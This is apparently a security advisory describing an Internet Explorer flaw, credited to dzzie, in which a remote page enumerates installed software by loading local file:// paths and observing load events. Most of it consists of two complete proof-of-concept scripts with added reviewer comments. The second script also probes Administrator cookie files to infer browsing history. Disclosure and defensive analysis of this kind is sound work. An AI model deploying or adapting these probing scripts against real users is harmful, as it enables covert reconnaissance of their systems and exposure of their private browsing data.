A security vulnerability in Internet Explorer allows remote sites to enumerate which programs are currently installed on the user's computer by requesting access to them through file:// URLs and monitoring the returned error code.
| |
Credit:
The information has been provided by dzzie.
|
| |
Exploit:
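(note: the 'i' in the opening iframe and script tags was replaced with '!'; an '!' elsewhere in the code, such as in if(!document.all), is part of the original script)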
Example 1:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>
// Browser guard: document.all is used as the test for Internet Explorer.
// Other browsers only get an alert; nothing stops the rest of the script from running.
if(!document.all){alert('Ughh this is IE5+ specific')}
// Opening markup of the results table that cycle() writes once every entry has been probed.
head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'
// Row template. cycle() substitutes "--" with the result markup and "-" with the entry label.
// NOTE(review): the "-" substitution also matches the hyphen in "sans-serif", so the label
// is inserted into the font face attribute as well (cosmetic only).
htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
'<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
'</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'
// Closing markup of the results table, followed by an iframe that loads disclaimer.txt via a relative URL.
tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'
// Callback wired to the probe's onload handler in cycle(): the local file loaded,
// so the y.jpg image markup is appended to entry x after a comma separator.
function yup(x) {
  var loadedMarkup = ',<img src="y.jpg">';
  img[x] = img[x] + loadedMarkup;
}
// Callback wired to the probe's onerror handler in cycle(): the local file did not load,
// so the x.jpg image markup is appended to entry x after a comma separator.
function nope(x) {
  var failedMarkup = ',<img src="x.jpg">';
  img[x] = img[x] + failedMarkup;
}
// Probe list. Each entry is one string of the form "label,absolute path": a display name
// and an image file at a fixed location (presumably one that the named product installs
// by default; the listing itself does not say so). Index 0 is never assigned.
// Defender note: the paths are fixed and guessable, so the only thing the page learns per
// entry is whether that file could be loaded, which is the existence signal being leaked.
img=new Array
img[1]="LogicTech Cam,C:\\Program Files\\Logitech\\QuickCam\\Samples\\Henry.jpg"
img[2]="Icq,C:\\Program Files\\ICQ\\Help\\HelpCards\\images\\bg.gif"
img[3]="Interdev,C:\\Program Files\\Microsoft Visual Studio\\VIntDev98\\Samples\\Gallery\\content\\images\\CLOUDS.JPG"
img[4]="VisualC,C:\\Program Files\\Microsoft Visual Studio\\VC98\\MFC\\Include\\Res\\TRUETYPE.BMP"
img[5]="WinAce,C:\\Program Files\\WinAce\\html\\images\\tip1.gif"
img[6]="Acrobat Reader4,C:\\Program Files\\Adobe\\Acrobat 4.0\\Reader\\plug_ins\\WEBBUY\\HTML\\table_btm.gif"
img[7]="Adobe PageMaker,C:\\Program Files\\Adobe\\PM65\\RSRC\\USENGLSH\\PLUGINS\\HTMLEXP.GIF"
img[8]="MS Office,C:\\Program Files\\Microsoft Office\\Office\\Bitmaps\\Dbwiz\\BOOKS.GIF"
img[9]="Delphi6,C:\\Program Files\\Borland\\Delphi6\\BORLAND.GIF"
img[10]="Visual Basic 6,C:\\Program Files\\Microsoft Visual Studio\\VB98\\Wizards\\PDWizard\\Setup1\\INSTALL.BMP"
img[11]="IIS,C:\\Inetpub\\iissamples\\sdk\\asp\\components\\ie.gif"
// Index of the next entry to probe; a global that cycle() reads and advances.
n=1
// Probes one entry of img per call and re-schedules itself a second later; once n reaches
// img.length it builds the results table and writes it over the current document.
function cycle(){
if(n < img.length){
// Split "label,path" and keep only the label in img[n]; yup()/nope() append the result to it.
dat=img[n].split(",")
img[n]=dat[0]
// Core of the information leak: an <img> whose src is a local file:// path, with onload and
// onerror wired to parent.yup / parent.nope. Which handler fires tells the remote page
// whether the file exists. The defence is browser-side: a page from a remote site should
// not be able to load file:// resources or observe the outcome of such a load.
it = "<img src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\" onerror=\"parent.nope(" + n + ")\">"
// ifrm is the frame element declared before the script (id="ifrm", height=1 width=1),
// reached here through its id as a global name.
ifrm.document.write(it)
// Remaining-probes counter. NOTE(review): no element with id "timer" appears in this
// listing; presumably it exists in a part of the original page that is not shown.
document.all.timer.innerText = img.length -n
n=n+1
// A string argument makes setTimeout evaluate the text as code after 1000 ms.
setTimeout("cycle();",1000)
}else{
tbl=' '
for(i=1;i<img.length;i++){
// By now each entry is expected to be "label,<img ...>": tmp[0] is the label, tmp[1] the result markup.
// NOTE(review): if neither handler fired for an entry, tmp[1] is undefined and
// join(undefined) falls back to the default "," separator.
tmp=img[i].split(",")
tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
}
// document.write after the page has finished loading replaces the whole document with the table.
document.write(head+tbl+tail)
}
}
// Start probing as soon as the script has been parsed.
cycle()
</script>
Example 2:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>
// Browser guard: document.all is used as the test for Internet Explorer.
// Other browsers only get an alert; nothing stops the rest of the script from running.
if(!document.all){alert('Ughh this is IE5+ specific')}
// Opening markup of the results table that cycle() writes once every entry has been probed.
head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'
// Row template. cycle() substitutes "--" with the result markup and "-" with the entry label.
// NOTE(review): the "-" substitution also matches the hyphen in "sans-serif", so the label
// is inserted into the font face attribute as well (cosmetic only).
htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
'<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
'</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'
// Closing markup of the results table, followed by an iframe that loads disclaimer.txt via a relative URL.
tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'
// Callback wired to the probe iframe's onload handler in cycle(): the local file loaded,
// so the y.jpg image markup is appended to entry x after a comma separator.
function yup(x) {
  var current = img[x];
  img[x] = current + ',<img src="y.jpg">';
}
// Marks entry x as not loaded by appending the x.jpg image markup after a comma separator.
// In this example it is called from cycle()'s table-building loop, not from an onerror handler.
function nope(x) {
  var current = img[x];
  img[x] = current + ',<img src="x.jpg">';
}
// Debug helper: shows an alert with the current probe index n. Its only reference in this
// listing is inside the commented-out onerror attribute in cycle().
function test() {
  var message = 'hey there' + n;
  alert(message);
}
// Probe list. Each entry is one string of the form "label,absolute path". Unlike the first
// example, the targets are text/XML files (readme, licence and install notes), which is
// why cycle() loads them in an iframe instead of an <img>. Index 0 is never assigned.
// Defender note: entries 4 and 5 point at cookie files in the Administrator profile, so a
// hit reveals more than installed software: presumably that this account exists and has
// visited the named site. The leak therefore extends to browsing history.
img=new Array
img[1]="Norton Anti V NT,C:\\Program Files\\Navnt\\end-user.txt"
img[2]="Norton AntiV 98,C:\\Program Files\\Norton AntiVirus\\end-user.txt"
img[3]="CygWin,C:\\cygwin\\usr\\doc\\lynx\\test\\README.txt"
img[4]="NT-Admin(google cookie),C:\\Documents and Settings\\Administrator\\Cookies\\administrator@google[1].txt"
img[5]="NT-Admin(hotmail cookie),c:\\Documents and Settings\\Administrator\\Cookies\\administrator@hotmail.msn[1].txt"
img[6]="Real Player,C:\\Program Files\\RealPlayer\\channels.xml"
img[7]="Eudora 3.x,C:\\Eudora\\Readme.txt"
img[8]="Masm,C:\\masm32\\LICENCE\\SDK_EULA.TXT"
img[9]="Php,C:\\PHP\\install.txt"
img[10]="Perl,C:\\Perl\\html\\EULA-Community_License.txt"
// Index of the next entry to probe; a global that cycle() reads and advances.
n=1
// Probes one entry of img per call and re-schedules itself a second later; once n reaches
// img.length it builds the results table and writes it over the current document.
function cycle(){
if(n < img.length){
// Split "label,path" and keep only the label in img[n]; yup()/nope() append the result to it.
dat=img[n].split(",")
img[n]=dat[0]
// Core of the information leak: an <iframe> whose src is a local file:// path with only
// onload wired (to parent.yup); the onerror part is commented out. A load that completes
// marks the file as present; the absence of a mark is treated as "not found" in the loop below.
// The defence is browser-side: a page from a remote site should not be able to
// load file:// resources or observe the outcome of such a load.
it = "<iframe src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\">" //onerror='test()'>"
// ifrm is the frame element declared before the script (id="ifrm", height=1 width=1),
// reached here through its id as a global name.
ifrm.document.write(it)
// Remaining-probes counter. NOTE(review): no element with id "timer" appears in this
// listing; presumably it exists in a part of the original page that is not shown.
document.all.timer.innerText = img.length -n
n=n+1
// A string argument makes setTimeout evaluate the text as code after 1000 ms.
setTimeout("cycle();",1000)
}else{
tbl=' '
for(i=1;i<img.length;i++){
// No 'src=' in the entry means yup() never ran for it, so it is marked as not loaded here.
if(img[i].indexOf('src=') < 1){ nope(i) }
// Each entry is now "label,<img ...>": tmp[0] is the label, tmp[1] the result markup.
tmp=img[i].split(",")
tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
}
// document.write after the page has finished loading replaces the whole document with the table.
document.write(head+tbl+tail)
}
}
// Start probing as soon as the script has been parsed.
cycle()
</script>